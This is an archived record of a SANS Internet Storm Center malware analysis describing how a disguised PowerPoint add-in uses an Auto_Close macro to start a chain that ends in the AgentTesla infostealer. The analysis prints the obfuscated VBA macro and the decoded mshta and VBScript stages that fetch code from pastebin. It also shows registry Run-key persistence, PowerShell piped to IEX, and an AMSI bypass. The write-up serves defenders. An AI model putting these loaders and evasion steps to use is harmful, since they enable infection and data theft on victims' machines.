{
	"id": "a037d468-6861-47c5-9db3-a8886fbe04cf",
	"created_at": "2026-04-06T00:13:33.670643Z",
	"updated_at": "2026-04-10T03:20:23.598816Z",
	"deleted_at": null,
	"sha1_hash": "77ced4fa7b4e0f253f40101876f60f09cb1b3fb2",
	"title": "AgentTesla Delivered via a Malicious PowerPoint Add-In",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 614199,
	"plain_text": "AgentTesla Delivered via a Malicious PowerPoint Add-In\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 23:18:17 UTC\r\nAttackers are always trying to find new ways to deliver malicious code to their victims. Microsoft Word and Excel documents can be easily weaponized by adding malicious VBA macros. Today, they are one of the most common techniques used to compromise a computer, especially because Microsoft implemented macros that are executed automatically when the document is opened. In Word, the macro must be named AutoOpen(). In Excel, the name must be Workbook_Open(). However, PowerPoint does not support this kind of macro. Really? Not in the same way as Word and Excel do!\r\nWhile hunting, I found an interesting document disguised as a PowerPoint template (with the extension ‘.pot’) delivered within a classic phishing email. In reality, it was not a template but an add-in. PowerPoint supports ‘add-ins’ developed by third parties to add new features[1]. And guess what? Add-ins are able to automatically execute macros. Here is the list of available actions:\r\nSub Auto_Open() - Gets executed immediately after the presentation is opened.\r\nSub Auto_Close() - Gets executed prior to the presentation being closed.\r\nSub Auto_Print() - Gets executed prior to the presentation being printed.\r\nSub Auto_ShowBegin() - Gets executed when the show begins.\r\nSub Auto_ShowEnd() - Gets executed when the show ends.\r\nSub Auto_NextSlide(Index as Long) - Gets executed before the slideshow moves onto the next slide. The index represents the SlideIndex of the Slide about to be displayed.\r\nTwo macros are fired automatically within an add-in: Auto_Open() and Auto_Close(). Auto_Open() is fired when the add-in is loaded and Auto_Close() is fired when the add-in is being unloaded. 
You can use them to do preprocessing, creating menu items, setting up event handlers, etc., or performing cleanup upon exiting.\r\nThe document (SHA256:b345b73a72f866ac3bc2945467d2678ca4976dd4c51bd0f2cdb142a79f56210a[2]) that I found contains an Auto_Close() macro that will open a URL when the victim closes PowerPoint. Let’s have a look at the document. Macros are stored in the same way as in Word or Excel: inside an OLE2 file:\r\nroot@remnux:/malwarezoo# file Payments\\ detail.pot\r\nPayments detail.pot: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code pag\r\nroot@remnux:/malwarezoo# oledump.py Payments\\ detail.pot\r\n 1: 2784 '\\x05DocumentSummaryInformation'\r\n 2: 380 '\\x05SummaryInformation'\r\n 3: 445 'PROJECT'\r\n 4: 26 'PROJECTwm'\r\n 5: M 1921 'VBA/Module1'\r\n 6: 2454 'VBA/_VBA_PROJECT'\r\n 7: 1377 'VBA/__SRP_0'\r\n 8: 88 'VBA/__SRP_1'\r\n 9: 392 'VBA/__SRP_2'\r\n 10: 103 'VBA/__SRP_3'\r\n 11: 493 'VBA/dir'\r\nhttps://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/\r\nPage 1 of 5\n\nroot@remnux:/malwarezoo# oledump.py Payments\\ detail.pot -s 5 -v\r\nAttribute VB_Name = \"Module1\"\r\n Sub auto_close()\r\n Dim yoCgYQoJx As Object\r\n Dim r5ozCUcyJ As String\r\n Dim a4CItAIOl As String\r\n Dim PhS6Kx17B As String\r\n PhS6Kx17B = (\"W\" + \"S\" + \"c\" + \"ript.Shell\")\r\n Set yoCgYQoJx = CreateObject(PhS6Kx17B)\r\n r5ozCUcyJ = StrReverse(\"\"\"a'*'zaebba'*'a'*'d\\p'*'.j\\\\:ptth\"\"\"\"aths'*'\"\"\")\r\n a4CItAIOl = Replace(r5ozCUcyJ, \"'*'\", \"m\")\r\n yoCgYQoJx.Run a4CItAIOl\r\nEnd Sub\r\nWhen the victim opens the ‘Payments detail.pot’ file, PowerPoint is launched and the add-in is silently installed. Seeing that no content is displayed (there is no slide to render), the user will close PowerPoint and the macro will be executed.\r\nYou can see the installed Add-ins in the PowerPoint options:\r\nThe macro simply launches a URL. 
In this case, Windows will try to open it with the default browser. The malicious URL is:\r\nhxxp://j[.]mp/dmamabbeazma\r\nThis HTTP request returns a 301 to a pastie:\r\nhxxps://pastebin[.]com/raw/U78a8pxJ\r\nHere is the pastie content (some JavaScript code):\r\n\u003cscript type=\"text/javascript\"\u003e\r\n\u003c!--\r\neval(unescape('%66%75%6e%63%74%69%6f%6e%20%72%65%37%31%66%63%33%31%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d\r\neval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%72%65%37%31%66%63%33%31%28%27') + '%39%70%62%71\r\n// --\u003e\r\n\u003c/script\u003e\r\nThe decoded version shows more payloads being downloaded:\r\nfunction re71fc31(s) {\r\n var r = \"\";\r\n var tmp = s.split(\"8863930\");\r\n s = unescape(tmp[0]);\r\n k = unescape(tmp[1] + \"635258\");\r\n for( var i = 0; i \u003c s.length; i++) {\r\n r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-2);\r\n }\r\n return r;\r\n} document.write(re71fc31('%39%70%62%71%63%71%76%24%6d%66%72%6c%7f%64%6c%60%3a%2c%2b%25%3c%3b%38%2a%20%30%3f\r\nAnd the decoded payload:\r\n\u003cscript language=\"\u0026#86;\u0026#66;\u0026#83;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\"\u003e\r\nCreateObject(\"WScript.Shell\").Run \"\"\"mshta\"\"\"\"http:\\\\pastebin.com\\raw\\3rM9m42v\"\"\"\r\nCreateObject(\"WScript.Shell\").Run StrReverse(\"/ 08 om/ ETUNIM cs/ etaerc/ sksathcs\") + \"tn \"\"Xvideos\"\" /tr \"\r\nCreateObject(\"WScript.Shell\").RegWrite StrReverse(\"TRATS\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\UCKH\"\r\nCreateObject(\"WScript.Shell\").RegWrite StrReverse(\"\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\UCKH\"), \"\"\r\nself.close\r\n\u003c/script\u003e\r\nThe script fetches two extra payloads from pastebin.com; one of them had already been removed, but I successfully grabbed a copy. 
Both are identical; here is the decoded payload:\r\n\u003cscript language=\"\u0026#86;\u0026#66;\u0026#83;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\"\u003e\r\nCreateObject(\"WScript.Shell\").RegWrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\bin\", \"mshta vbsc\r\nCreateObject(\"Wscript.Shell\").regwrite \"HKCU\\Software\\iamresearcher\", \"$fucksecurityresearchers='contactmeEX\r\nConst HIDDEN_WINDOW = 0\r\nstrComputer = \".\"\r\nSet objWMIService = GetObject(\"winmgmts:\" \u0026 \"{impersonationLevel=impersonate}!\\\\\" \u0026 strComputer \u0026 \"\\root\\cim\r\nSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\r\nSet objConfig = objStartup.SpawnInstance_\r\nobjConfig.ShowWindow = HIDDEN_WINDOW\r\nSet objProcess = GetObject(\"winmgmts:root\\cimv2:Win32_Process\")\r\nerrReturn = objProcess.Create( \"powershell ((gp HKCU:\\Software).iamresearcher)|IEX\", null, objConfig, intPro\r\n'i am not a coder not a expert i am script kiddie expert i read code from samples on site then compile in my\r\n'i am not a coder ;) i watch you on twitter every day thanks :) i love my code reports!\r\n'i am not a coder! bang ;)\r\nself.close\r\n\u003c/script\u003e\r\n(Note the funny comments at the end of the script.)\r\nTwo new pasties are fetched. 
Here is the decoded content (PowerShell code):\r\nfunction UNpaC0k3333300001147555 {\r\n [CmdletBinding()]\r\n Param ([byte[]] $byteArray)\r\n Process {\r\n Write-Verbose \"Get-DecompressedByteArray\"\r\n $input = New-Object System.IO.MemoryStream( , $byteArray )\r\n $output = New-Object System.IO.MemoryStream\r\n $01774000 = New-Object System.IO.Compression.GzipStream $input,\r\n ([IO.Compression.CompressionMode]::Decompress)\r\n $puffpass = New-Object byte[](1024)\r\n while($true) {\r\n $read = $01774000.Read($puffpass, 0, 1024)\r\n if ($read -le 0){break}\r\n $output.Write($puffpass, 0, $read)\r\n }\r\n [byte[]] $bout333 = $output.ToArray()\r\n Write-Output $bout333\r\n }\r\n}\r\n$t0='DEX'.replace('D','I');sal g $t0;[Byte[]]$MNB=('@!1F,@!8B,@!08,@!00,@!00,@!00,@!00,@!00,@!04,@!00,@!ED,@\r\n[stuff removed]\r\n7F,@!33,@!D0,@!4A,@!F9,@!3E,@!89,@!0D,@!DF,@!D6,@!F3,@!4D,@!3E,@!3D,@!8C,@!3C,@!08,@!46,@!20,@!B6,@!2B,@!82,\r\n[Byte[]]$blindB=('@!1F,@!8B,@!08,@!00,@!00,@!00,@!00,@!00,@!04,@!00,@!CC,@!BD,@!07,@!78,@!14,@!55,@!DB,@!3F,\r\n[stuff removed]\r\nF2,@!D3,@!57,@!FF,@!E7,@!66,@!03,@!86,@!AC,@!3C,@!96,@!D0,@!16,@!EC,@!FD,@!F1,@!99,@!5B,@!54,@!79,@!24,@!D3,\r\n[byte[]]$deblindB = UNpaC0k3333300001147555 $blindB\r\n$blind=[System.Reflection.Assembly]::Load($deblindB)\r\n[Amsi]::Bypass()\r\n[byte[]]$decompressedByteArray = UNpaC0k3333300001147555 $MNB\r\nThe two hex-encoded chunks of data decoded into a DLL and a PE. 
The PE is an AgentTesla malware sample\r\n(SHA256: d46615754e00e004d683ff2ad5de9bca976db9d110b43e0ab0f5ae35c652fab7[3])\r\nConclusion: PowerPoint can also be used to deliver malicious content!\r\n[1] https://docs.microsoft.com/en-us/office/dev/add-ins/tutorials/powerpoint-tutorial\r\n[2] https://www.virustotal.com/gui/file/b345b73a72f866ac3bc2945467d2678ca4976dd4c51bd0f2cdb142a79f56210a/detection\r\n[3] https://www.virustotal.com/gui/file/d46615754e00e004d683ff2ad5de9bca976db9d110b43e0ab0f5ae35c652fab7/detection\r\nXavier Mertens (@xme)\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nSource: https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/"
	],
	"report_names": [
		"26162"
	],
	"threat_actors": [],
	"ts_created_at": 1775434413,
	"ts_updated_at": 1775791223,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/77ced4fa7b4e0f253f40101876f60f09cb1b3fb2.pdf",
		"text": "https://archive.orkl.eu/77ced4fa7b4e0f253f40101876f60f09cb1b3fb2.txt",
		"img": "https://archive.orkl.eu/77ced4fa7b4e0f253f40101876f60f09cb1b3fb2.jpg"
	}
}